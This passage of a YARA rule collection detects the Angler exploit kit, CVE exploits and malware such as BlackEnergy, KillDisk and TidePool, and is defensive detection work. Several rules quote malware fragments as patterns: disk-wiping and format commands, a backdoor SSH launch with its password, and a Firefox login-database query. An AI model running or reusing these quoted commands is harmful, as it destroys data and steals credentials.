      $string4 = "Fq B3 94 E3 3E EFw E6 AA9 3A 5B 9E2 D2 EC AF6 10c 83 0F DF BB FBx AF B4 1BV 5C DD F8 9BR 97v D0U 9EG"   
      $string5 = "29 9B 01E C85 86 B0 09 EC E07 AFCY 19 E5 11 1C 92 E2 DA A9 5D 19P 3A BF AB D6 B3 3FZ B4 92 FF E1 27 "   
      $string6 = "B A9 88 B8 F0 EBLd 8E 08 18 11P EE BFk 15 5BM D6 B7 CEh AF 9C 8F 04 89 88 5E F6 ED 13 8EN1p 86Vk BC "   
      $string7 = "w F4 C8 16pV 22 0A BB EB 83 7D BC 89 B6 E06 8B 2A DC E6 7D CE. 0Dh 18 0A8 5E 60 0C BF A4 00M 00 E3 3"   
      $string8 = "B7 C6 E3 8E DC 3BR 60L 94h D8 AA7k5s 0D 7Fb 8B 80P E0 1BP EBT B5 03zE D0o 2A B97 18 F39 7C 94 99 11 "   
      $string9 = "kY 24 8E 3E 94 84 D2 00 1EB 16 A4 9C 28 24 C1B BB 22 7D 97c F5 BA AD C4 5C 23 5D 3D 5C A7d5 0C F6 EA"   
      $string10 = "08 01 3A 15 3B E0 1A E2 89 5B A2 F4 ED 87O F9l A99 124 27 BF BB A1c 2BW 12Z 07 AA D9 81 B7 A6-5 E2 E"   
      $string11 = " 16 BF A7 0E 00 16 BB 8FB CBn FC D8 9C C7 EA AC C2q 85n A96I D1 9B FC8 BDl B8 3Ajf 7B ADH FD 20 88 F"   
      $string12 = "  ML    "   
      $string13 = " AEJ 3B C7 BFy EF F07X D3 A0 1E B4q C4 BE 3A 10 E7 A0 FE D1Jhp 89 A0sj 1CW 08 D5 F7 C8 C6 D5I 81 D2 "   
      $string14 = "B 24 90 ED CEP C8 C9 9B E5 25 09 C6B- 2B 3B C7 28 C9 C62 EB D3 D5 ED DE A8 7F A9mNs 87 12 82 03 A2 8"   
      $string15 = "A 3A A2L DFa 18 11P 00 7F1 BBbY FA 5E 04 C4 5D 89 F3S DAN B5 CAi 8D 0A AC A8 0A ABI E6 1E 89 BB 07 D"   
      $string16 = "C B5 FD 0B F9 0Ch CE 01 14 8Dp AF 24 E0 E3 D90 DD FF B0 07 2Ad 0B 7D B0 B2 D8 BD E6 A7 CE E1 E4 3E5 "   
      $string17 = "19 0C 85 14r/ 8C F3 84 2B 8C CF 90 93 E2 F6zo C3 D40 A6 94 01 02Q 21G AB B9 CDx 9D FB 21 2C 10 C3 3C"   
      $string18 = "FAV D7y A0 C7Ld4 01 22 EE B0 1EY FAB BA E0 01 24 15g C5 DA6 19 EEsl BF C7O 9F 8B E8 AF 93 F52 00 06 "   
   condition:   
      18 of them   
rule angler_js : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "Angler Exploit Kit Detection"   
      hash0 = "482d6c24a824103f0bcd37fa59e19452"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "    2654435769,   Be"   
      $string1 = "DFOMIqka "   
      $string2 = ",  Zydr$>>16"   
      $string3 = "DFOMIqka( 'OPPj_phuPuiwzDFo')"   
      $string4 = "U0BNJWZ9J0vM43TnlNZcWnZjZSelQZlb1HGTTllZTm19emc0dlsYF13GvhQJmTZmbVMxallMdhWW948YWi t    P  b50GW"   
      $string5 = "    auSt;"   
      $string6 = " eval    (NDbMFR "   
      $string7 = "jWUwYDZhNVyMI2TzykEYjWk0MDM5MA%ZQ1TD1gEMzj         3  D       ',"   
      $string8 = "('fE').substr    (2    ,    1 "   
      $string9 = ",  -1 "   
      $string10 = "    )  );Zydr$  [ 1]"   
      $string11 = " 11;PsKnARPQuNNZMP<9;PsKnARPQuNNZMP"   
      $string12 = "new   Array  (2),  Ykz"   
      $string13 = "<script> "   
      $string14 = ");    CYxin "   
      $string15 = "Zydr$    [    1]"   
      $string16 = "var tKTGVbw,auSt, vnEihY, gftiUIdV, XnHs, UGlMHG, KWlqCKLfCV;"   
      $string17 = "reXKyQsob1reXKyQsob3 "   
   condition:   
      17 of them   
rule angler_html2 : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "Angler Exploit Kit Detection"   
      hash0 = "6c926bf25d1a8a80ab988c8a34c0102e"   
      sample_filetype = "js-html"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "E 06 E7i 1E 91q 9C D0J 1D 9B 14 E7g 1D DD ECK 20c 40 C6 0C AFR5 3D 03 9Em EC 0CB C9 A9 DFw C9 ADP 5B"   
      $string1 = "14Bc 5C 3Bp CB 2A 12 3D A56 AA 14 87 E3 81 8A 80h 27 1C 3A4 CE 12 AE FAy F0 8A 21 B8I AD 1E B9 2C D1"   
      $string2 = "0J 95 83 CC 1C 95D CAD 1A EA F3 00 E9 DA_ F2 ED 3CM1 A0 01t 1B EE 2C B6AWKq BF CAY FE D8 F2 7C 96 92"   
      $string3 = "A8MTCsn C9 DBu D3 10 A0 D4 AC A9 97 06Rn 01 DAK EFFN ADP AE 0E 8FJd 8F DA B6 25RO 18 2A 00 EA F9 8B "   
      $string4 = "A3 EB C1 CE 1E C4ok C4 19 F2 A7 17 9FCoz B6- C6 25J BB 0B 8C1OZ E4 7B AEz F6 06A 5D C0 D7 E8 FF DB D"   
      $string5 = " 07 DE A3 F8 B0 B3 20V A4 B2 C8 60 BD EEG 95 BB 04 1Ckw A4 80 E6 23 F02 FA 9C 9A 14F BDC 18 BE BD B4"   
      $string6 = "7 D1 B9 9B AC 2AN BA D3 00 A9 1CJ3J C0V 8F 8E FC B6p9 00 E1 01 21j B3 27 FF C3 8E 2B 92 8B DEiUI C3 "   
      $string7 = " 99 2C AF9 F9 3F5 A8 F0 1BU C8e/ 00Q B4 10 DD BC 9D 8A BF B2 17 8F BFd DB D1 B7 E66 21 96 86 1E B2 1"   
      $string8 = "E86 DF9 22Tg E93 9Em 29 0A 5B B5m E2 DCIF D6 D2 F5B CF F7XkRv BE EA A6 C5 82p 5E B3 B4aD B9 3A E0 22"   
      $string9 = " 7C 95.q D6f E8 1AE 17 82T 84 F1/O 82 C2q C7 FE 05C E4 E5W F5 0A E4l 12 3Brt 8A E0 E7 DDJ 1F 1F C4 A"   
      $string10 = "4t 91iE BD 2C 95U E9 1C AE 5B 5B A3 9D B2 F9 0B B5 15S9 AB 9D 94 85 A6 F1 AF B6 FC CAt 91iE BD 2C 95"   
      $string11 = "  </input>"   
      $string12 = "2 D12 93 FD AB 0DKK AEN 40 DA 88 7B FA 3B 18 EE 09 92 ED AF A8b 07 002 0A A3S 04 29 F9 A3 EA BB E9 7"   
      $string13 = "40 C6 0C AFR5E 15 07 EE CBg B3 C6 60G 92tFt D7E 7D F0 C4 A89 29 EC BA E1 D9 3D 23 F0 0B E0o 3E2c B3 "   
      $string14 = "2 A3. A3 F1 D8 D4 A83K 9C AEu FF EA 02 F4 B8 A0 EE C9 7B 15 C1 07D 80 7C 10 864 96 E3 AA F8 99bgve D"   
      $string15 = "C 7D DC 0A E9 0D A1k 85s 9D 24 8C D0k E1 7E 3AH E2 052 D8q 16 FC 96 0AR C0 EC 99K4 3F BE ED CC DBE A"   
      $string16 = "40 DA 88 7B 9E 1A B3 FA DE 90U 5B BD6x 9A 0C 163 AB EA ED B4 B5 98 ADL B7 06 EE E5y B8 9B C9Q 00 E9 "   
      $string17 = "F BF_ F9 AC 5B CC 0B1 7B 60 20c 40 C6 0C AFR5 0B C7D 09 9D E30 14 AC 027 B2 B9B A7 06 E3z DC- B2 60 "   
      $string18 = "0 80 97Oi 8C 85 D2 1Bp CDv 11 05 D4 26 E7 FC 3DlO AE 96 D2 1B 89 7C 16H 11 86 D0 A6 B95 FC 01 C5 8E "   
   condition:   
      18 of them   
rule angler_flash_uncompressed : EK   
   {   
   meta:   
      author = "Josh Berry"   
      date = "2016-06-26"   
      description = "Angler Exploit Kit Detection"   
      hash0 = "2543855d992b2f9a576f974c2630d851"   
      sample_filetype = "unknown"   
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
      $string0 = "DisplayObjectContainer"   
      $string1 = "Xtime2"   
      $string2 = "(HMRTQ"   
      $string3 = "flash.events:EventDispatcher$flash.display:DisplayObjectContainer"   
      $string4 = "_e_-___-__"   
      $string5 = "ZviJbf"   
      $string6 = "random-"   
      $string7 = "_e_-_-_-_"   
      $string8 = "_e_------"   
      $string9 = "817677162"   
      $string10 = "_e_-__-"   
      $string11 = "-[vNnZZ"   
      $string12 = "5:unpad: Invalid padding value. expected ["   
      $string13 = "writeByte/"   
      $string14 = "enumerateFonts"   
      $string15 = "_e_---___"   
      $string16 = "_e_-_-"   
      $string17 = "f(fOJ4"   
   condition:   
      17 of them   
// https://otx.alienvault.com/pulse/58239a2b4dc3d210c9784e20
// https://otx.alienvault.com/pulse/594c18574797aa0bf989b440
rule Flash_CVE_2015_5119_APT3 : Exploit {   
       meta:   
           description = "Exploit Sample CVE-2015-5119"   
           author = "Florian Roth"   
           score = 70   
           date = "2015-08-01"   
       strings:   
           $s0 = "HT_exploit" fullword ascii   
           $s1 = "HT_Exploit" fullword ascii   
           $s2 = "flash_exploit_" ascii   
           $s3 = "exp1_fla/MainTimeline" ascii fullword   
           $s4 = "exp2_fla/MainTimeline" ascii fullword   
           $s5 = "_shellcode_32" fullword ascii   
           $s6 = "todo: unknown 32-bit target" fullword ascii    
       condition:   
           uint16(0) == 0x5746 and 1 of them   
// https://otx.alienvault.com/pulse/574283870353fb0131f05259
rule TidePool_Malware   
   {   
      
       meta:   
           description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks"   
           author = "Florian Roth"   
           reference = "http://goo.gl/m2CXWR"   
           date = "2016-05-24"   
           hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"   
           hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed"   
           hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18"   
           hash4 = "38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f"   
           hash5 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"   
      
       strings:   
           $x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" fullword ascii   
           $x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" fullword wide   
           $x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" fullword wide   
           $x4 = "IEComDll.dat" fullword ascii   
           $s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" fullword wide   
           $s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide   
           $s3 = "network.proxy.socks_port\", " fullword ascii   
          
       condition:   
           ( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($x*) ) ) or ( 4 of them )   
rule Mal_http_EXE : Trojan {   
   	meta:   
   		description = "Detects trojan from APT report named http.exe"   
   		author = "Florian Roth"   
   		reference = "https://goo.gl/13Wgy1"   
   		date = "2016-05-25"   
   		score = 80   
   		hash1 = "ad191d1d18841f0c5e48a5a1c9072709e2dd6359a6f6d427e0de59cfcd1d9666"   
   	strings:   
   		$x1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"%s\"" fullword ascii   
   		$x2 = "%ALLUSERSPROFILE%\\Accessories\\wordpade.exe" fullword ascii   
   		$x3 = "\\dumps.dat" fullword ascii   
   		$x4 = "\\wordpade.exe" fullword ascii   
   		$x5 = "\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|" fullword ascii   
   		$x6 = "\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|" fullword ascii   
   		$x7 = "cKaNBh9fnmXgJcSBxx5nFS+8s7abcQ==" fullword ascii   
   		$x8 = "cKaNBhFLn1nXMcCR0RlbMQ==" fullword ascii /* base64: p
[1 */   
      
   		$s1 = "SELECT * FROM moz_logins;" fullword ascii   
   		$s2 = "makescr.dat" fullword ascii   
   		$s3 = "%s\\Mozilla\\Firefox\\profiles.ini" fullword ascii   
   		$s4 = "?moz-proxy://" fullword ascii   
   		$s5 = "[%s-%s] Title: %s" fullword ascii   
   		$s6 = "Cforeign key mismatch - \"%w\" referencing \"%w\"" fullword ascii   
   		$s7 = "Windows 95 SR2" fullword ascii   
   		$s8 = "\\|%s|0|0|" fullword ascii   
   	condition:   
   		( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) and 2 of ($s*) ) ) or ( 3 of ($x*) )   
rule Mal_Dropper_httpEXE_from_CAB : Dropper {   
   	meta:   
   		description = "Detects a dropper from a CAB file mentioned in the article"   
   		author = "Florian Roth"   
   		reference = "https://goo.gl/13Wgy1"   
   		date = "2016-05-25"   
   		score = 60   
   		hash1 = "9e7e5f70c4b32a4d5e8c798c26671843e76bb4bd5967056a822e982ed36e047b"   
   	strings:   
   		$s1 = "029.Hdl" fullword ascii   
   		$s2 = "http.exe" fullword ascii   
   	condition:   
   		( uint16(0) == 0x5a4d and filesize < 1000KB and ( all of ($s*) ) )   
rule Mal_PotPlayer_DLL : dll {   
   	meta:   
   		description = "Detects a malicious PotPlayer.dll"   
   		author = "Florian Roth"   
   		reference = "https://goo.gl/13Wgy1"   
   		date = "2016-05-25"   
   		score = 70   
   		hash1 = "705409bc11fb45fa3c4e2fa9dd35af7d4613e52a713d9c6ea6bc4baff49aa74a"   
   	strings:   
   		$x1 = "C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdb" fullword ascii   
      
   		$s3 = "PotPlayer.dll" fullword ascii   
   		$s4 = "\\update.dat" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 200KB and $x1 or all of ($s*)   
// https://otx.alienvault.com/pulse/55eedc264637f26df8742a70
rule Exploit_MS15_077_078: Exploit {   
   	meta:   
   		description = "MS15-078 / MS15-077 exploit - generic signature"   
   		author = "Florian Roth"   
   		reference = "https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200"   
   		date = "2015-07-21"   
   		hash1 = "18e3e840a5e5b75747d6b961fca66a670e3faef252aaa416a88488967b47ac1c"   
   		hash2 = "0b5dc030e73074b18b1959d1cf7177ff510dbc2a0ec2b8bb927936f59eb3d14d"   
   		hash3 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"   
   		hash4 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"   
   	strings:   
   		$s1 = "GDI32.DLL" fullword ascii   
   		$s2 = "atmfd.dll" fullword wide   
   		$s3 = "AddFontMemResourceEx" fullword ascii   
   		$s4 = "NamedEscape" fullword ascii   
   		$s5 = "CreateBitmap" fullword ascii   
   		$s6 = "DeleteObject" fullword ascii   
      
   		$op0 = { 83 45 e8 01 eb 07 c7 45 e8 } /* Opcode */   
   		$op1 = { 8d 85 24 42 fb ff 89 04 24 e8 80 22 00 00 c7 45 } /* Opcode */   
   		$op2 = { eb 54 8b 15 6c 00 4c 00 8d 85 24 42 fb ff 89 44 } /* Opcode */   
   		$op3 = { 64 00 88 ff 84 03 70 03 }   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 2000KB and all of ($s*) or all of ($op*)   
rule Exploit_MS15_077_078_HackingTeam: Exploit {   
   	meta:   
   		description = "MS15-078 / MS15-077 exploit - Hacking Team code"   
   		author = "Florian Roth"   
   		date = "2015-07-21"   
   		super_rule = 1   
   		hash1 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"   
   		hash2 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"   
   	strings:   
   		$s1 = "\\SystemRoot\\system32\\CI.dll" fullword ascii /* PEStudio Blacklist: strings */   
   		$s2 = "\\sysnative\\CI.dll" fullword ascii /* PEStudio Blacklist: strings */   
   		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" fullword ascii /* PEStudio Blacklist: strings */   
   		$s4 = "CRTDLL.DLL" fullword ascii   
   		$s5 = "\\sysnative" fullword ascii /* PEStudio Blacklist: strings */   
   		$s6 = "InternetOpenA coolio, trying open %s" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 2500KB and all of them   
// https://otx.alienvault.com/pulse/5808d0bd10ce3f0203e82ef2
rule CVE_2015_1701_Taihou {   
   	meta:   
   		description = "CVE-2015-1701 compiled exploit code"   
   		author = "Florian Roth"   
   		reference = "http://goo.gl/W4nU0q"   
   		date = "2015-05-13"   
   		hash1 = "90d17ebd75ce7ff4f15b2df951572653efe2ea17"   
   		hash2 = "acf181d6c2c43356e92d4ee7592700fa01e30ffb"   
   		hash3 = "b8aabe12502f7d55ae332905acee80a10e3bc399"   
   		hash4 = "d9989a46d590ebc792f14aa6fec30560dfe931b1"   
   		hash5 = "63d1d33e7418daf200dc4660fc9a59492ddd50d9"   
   		score = 70   
   	strings:	   
   		$s3 = "VirtualProtect" fullword   
   		$s4 = "RegisterClass"   
   		$s5 = "LoadIcon"   
   		$s6 = "PsLookupProcessByProcessId" fullword ascii    
   		$s7 = "LoadLibraryExA" fullword ascii   
   		$s8 = "gSharedInfo" fullword   
      
   		$w1 = "user32.dll" wide   
   		$w2 = "ntdll" wide	   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 160KB and all of ($s*) and 1 of ($w*)   
// https://otx.alienvault.com/pulse/595f8c5c880ffa2a06bbb8ec
rule CVE_2013_0422   
   {   
           meta:   
                   description = "Java Applet JMX Remote Code Execution"   
                   cve = "CVE-2013-0422"   
                   ref = "http://pastebin.com/JVedyrCe"   
                   author = "adnan.shukor@gmail.com"   
                   date = "12-Jan-2013"   
                   version = "1"   
                   impact = 4   
                   hide = false   
           strings:   
                   $0422_1 = "com/sun/jmx/mbeanserver/JmxMBeanServer" fullword   
                   $0422_2 = "com/sun/jmx/mbeanserver/JmxMBeanServerBuilder" fullword   
                   $0422_3 = "com/sun/jmx/mbeanserver/MBeanInstantiator" fullword   
                   $0422_4 = "findClass" fullword   
                   $0422_5 = "publicLookup" fullword   
                   $class = /sun\.org\.mozilla\.javascript\.internal\.(Context|GeneratedClassLoader)/ fullword    
           condition:   
                   (all of ($0422_*)) or (all of them)   
// https://otx.alienvault.com/pulse/54f7475713432a7ab3105f1a
rule cve_2013_0074   
   {   
   meta:   
   	author = "Kaspersky Lab"   
   	filetype = "Win32 EXE"   
   	date = "2015-07-23"   
   	version = "1.0"   
      
   strings:   
   	$b2="Can't find Payload() address" ascii wide   
   	$b3="/SilverApp1;component/App.xaml" ascii wide   
   	$b4="Can't allocate ums after buf[]" ascii wide   
   	$b5="------------ START ------------"   
      
   condition:   
   	( (2 of ($b*)) )   
// https://otx.alienvault.com/pulse/5544c0d3b45ff53b128efa6b
rule FlashNewfunction: decodedPDF   
   {   
      meta:     
         ref = "CVE-2010-1297"   
         hide = true   
         impact = 5    
         ref = "http://blog.xanda.org/tag/jsunpack/"   
      strings:   
         $unescape = "unescape" fullword nocase   
         $shellcode = /%u[A-Fa-f0-9]{4}/   
         $shellcode5 = /(%u[A-Fa-f0-9]{4}){5}/   
         $cve20101297 = /\/Subtype ?\/Flash/   
      condition:   
         ($unescape and $shellcode and $cve20101297) or ($shellcode5 and $cve20101297)   
// https://otx.alienvault.com/pulse/547cb9c811d4083bc021c392
rule macrocheck : maldoc   
   {   
       meta:   
           Author      = "Fireeye Labs"   
           Date        = "2014/11/30"    
           Description = "Identify office documents with the MACROCHECK credential stealer in them.  It can be run against .doc files or VBA macros extraced from .docx files (vbaProject.bin files)."   
           Reference   = "https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html"   
      
       strings:   
           $PARAMpword = "pword=" ascii wide   
           $PARAMmsg = "msg=" ascii wide   
           $PARAMuname = "uname=" ascii   
           $userform = "UserForm" ascii wide   
           $userloginform = "UserLoginForm" ascii wide   
           $invalid = "Invalid username or password" ascii wide   
           $up1 = "uploadPOST" ascii wide   
           $up2 = "postUpload" ascii wide   
       
       condition:   
           all of ($PARAM*) or (($invalid or $userloginform or $userform) and ($up1 or $up2))   
// https://otx.alienvault.com/pulse/58ed1ab5626aa6187252f3b6
rule malrtf_ole2link : exploit   
   {   
   	meta:   
   		author = "@h3x2b <tracker _AT h3x.eu>"   
   		description = "Detect weaponized RTF documents with OLE2Link exploit"   
      
   	strings:   
   		//normal rtf beginning   
   		$rtf_format_00 = "{\\rtf1"   
   		//malformed rtf can have for example {\\rtA1   
   		$rtf_format_01 = "{\\rt"   
      
   		//having objdata structure   
   		$rtf_olelink_01 = "\\objdata" nocase   
      
   		//hex encoded OLE2Link   
   		$rtf_olelink_02 = "4f4c45324c696e6b" nocase   
      
   		//hex encoded docfile magic - doc file albilae   
   		$rtf_olelink_03 = "d0cf11e0a1b11ae1" nocase   
      
   		//hex encoded "http://"   
   		$rtf_payload_01 = "68007400740070003a002f002f00" nocase   
      
   		//hex encoded "https://"   
   		$rtf_payload_02 = "680074007400700073003a002f002f00" nocase   
      
   		//hex encoded "ftp://"   
   		$rtf_payload_03 = "6600740070003a002f002f00" nocase   
      
      
   	condition:   
   		//new_file and   
   		any of ($rtf_format_*)   
   		and all of ($rtf_olelink_*)   
   		and any of ($rtf_payload_*)   
// https://otx.alienvault.com/pulse/58c91f28bfefb5577afba777
rule Upatre_Hazgurut {   
   	meta:   
   		description = "Detects Upatre malware - file hazgurut.exe"   
   		author = "Florian Roth"   
   		reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7"   
   		date = "2015-10-13"   
   		score = 70   
   		hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50"   
   		hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92"   
   		hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3"   
   		hash4 = "c64282aca980d558821bec8b3dfeae562d9620139dc43d02ee4d1745cd989f2a"   
   		hash5 = "a35f9870f9d4b993eb094460b05ee1f657199412807abe6264121dd7cc12aa70"   
   		hash6 = "f8cb2730ebc8fac1c58da1346ad1208585fe730c4f03d976eb1e13a1f5d81ef9"   
   		hash7 = "b65ad7e2d299d6955d95b7ae9b62233c34bc5f6aa9f87dc482914f8ad2cba5d2"   
   		hash8 = "6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3"   
   		hash9 = "33a288cef0ae7192b34bd2ef3f523dfb7c6cbc2735ba07edf988400df1713041"   
   		hash10 = "2a8e50afbc376cb2a9700d2d83c1be0c21ef942309676ecac897ba4646aba273"   
   		hash11 = "3d0f2c7e07b7d64b1bad049b804ff1aae8c1fc945a42ad555eca3e1698c7f7d3"   
   		hash12 = "951360b32a78173a1f81da0ded8b4400e230125d05970d41621830efc5337274"   
   		hash13 = "bd90faebfd7663ef89b120fe69809532cada3eb94bb94094e8bc615f70670295"   
   		hash14 = "8c5823f67f9625e4be39a67958f0f614ece49c18596eacc5620524bc9b6bad3d"   
   	strings:   
   		$a1 = "barcod" fullword ascii   
      
   		$s0 = "msports.dll" fullword ascii   
   		$s1 = "nddeapi.dll" fullword ascii   
   		$s2 = "glmf32.dll" fullword ascii   
   		$s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" fullword ascii   
   		$s4 = "cmutil.dll" fullword ascii   
   		$s5 = "mprapi.dll" fullword ascii   
   		$s6 = "glmf32.dll" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1500KB   
   		and $a1 in (0..4000)   
   		and all of ($s*)   
rule hancitor_dropper : vb_win32api   
   {   
     meta:   
       author = "Jeff White - jwhite@paloaltonetworks @noottrak"   
       date   = "18AUG2016"   
       hash1  = "03aef51be133425a0e5978ab2529890854ecf1b98a7cf8289c142a62de7acd1a"   
       hash2  = "4b3912077ef47515b2b74bc1f39de44ddd683a3a79f45c93777e49245f0e9848"   
       hash3  = "a78972ac6dee8c7292ae06783cfa1f918bacfe956595d30a0a8d99858ce94b5a"   
      
     strings:   
       $api_01 = { 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 }  // VirtualAlloc   
       $api_02 = { 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 }  // RtlMoveMemory   
       $api_04 = { 00 43 61 6C 6C 57 69 6E 64 6F 77 50 72 6F 63 41 00 }  // CallWindowProcAi   
       $magic  = { 50 4F 4C 41 }  // POLA   
      
     condition:   
       uint32be(0) == 0xD0CF11E0 and all of ($api_*) and $magic   
// https://otx.alienvault.com/pulse/56bda3614637f25d9365df7c
rule BlackEnergy_VBS_Agent    
   {   
      
       meta:   
           description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"   
           author = "Florian Roth"   
           reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"   
           date = "2016-01-03"   
           hash = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f"   
          
       strings:   
           $s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii   
           $s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii   
           $s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii /* Goodware String - occured 1 times */   
         
       condition:   
           filesize < 1KB and 2 of them   
rule BlackEnergy_KillDisk_1    
   {   
      
       meta:   
           description = "Detects KillDisk malware from BlackEnergy"   
           author = "Florian Roth"   
           reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"   
           date = "2016-01-03"   
           score = 80   
           super_rule = 1   
           hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"   
           hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"   
           hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"   
           hash4 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"   
      
       strings:   
           $s0 = "system32\\cmd.exe" fullword ascii   
           $s1 = "system32\\icacls.exe" fullword wide   
           $s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii   
           $s3 = "shutdown /r /t %d" fullword ascii   
           $s4 = "/C /Q /grant " fullword wide   
           $s5 = "%08X.tmp" fullword ascii   
           $s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii   
           $s7 = "/c format %c: /Y /Q" fullword ascii   
           $s8 = "taskhost.exe" fullword wide /* Goodware String - occured 1 times */   
           $s9 = "shutdown.exe" fullword wide /* Goodware String - occured 1 times */   
       
       condition:   
           uint16(0) == 0x5a4d and filesize < 500KB and 8 of them   
rule BlackEnergy_BackdoorPass_DropBear_SSH    
   {   
          
       meta:   
           description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"   
           author = "Florian Roth"   
           reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"   
           date = "2016-01-03"   
           hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"   
          
       strings:   
           $s1 = "passDs5Bu9Te7" fullword ascii   
          
       condition:   
           uint16(0) == 0x5a4d and $s1   
rule BlackEnergy_BE_2    
   {   
         
      meta:   
         description = "Detects BlackEnergy 2 Malware"   
         author = "Florian Roth"   
         reference = "http://goo.gl/DThzLz"   
         date = "2015/02/19"   
         hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"   
         
      strings:   
         $s0 = "<description> Windows system utility service  </description>" fullword ascii   
         $s1 = "WindowsSysUtility - Unicode" fullword wide   
         $s2 = "msiexec.exe" fullword wide   
         $s3 = "WinHelpW" fullword ascii   
         $s4 = "ReadProcessMemory" fullword ascii   
         
      condition:   
         uint16(0) == 0x5a4d and filesize < 250KB and all of ($s*)   
rule BlackEnergy_Driver_USBMDM    
   {   
      
       meta:   
           description = "Auto-generated rule - from files 7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094, b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a, edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"   
           author = "Florian Roth"   
           reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"   
           date = "2016-01-04"   
           super_rule = 1   
           hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"   
           hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"   
           hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"   
           hash4 = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc"   
           hash5 = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291"   
           hash6 = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5"   
           hash7 = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5"   
           hash8 = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf"   
          
       strings:   
           $s1 = "USB MDM Driver" fullword wide   
           $s2 = "KdDebuggerNotPresent" fullword ascii /* Goodware String - occured 50 times */   
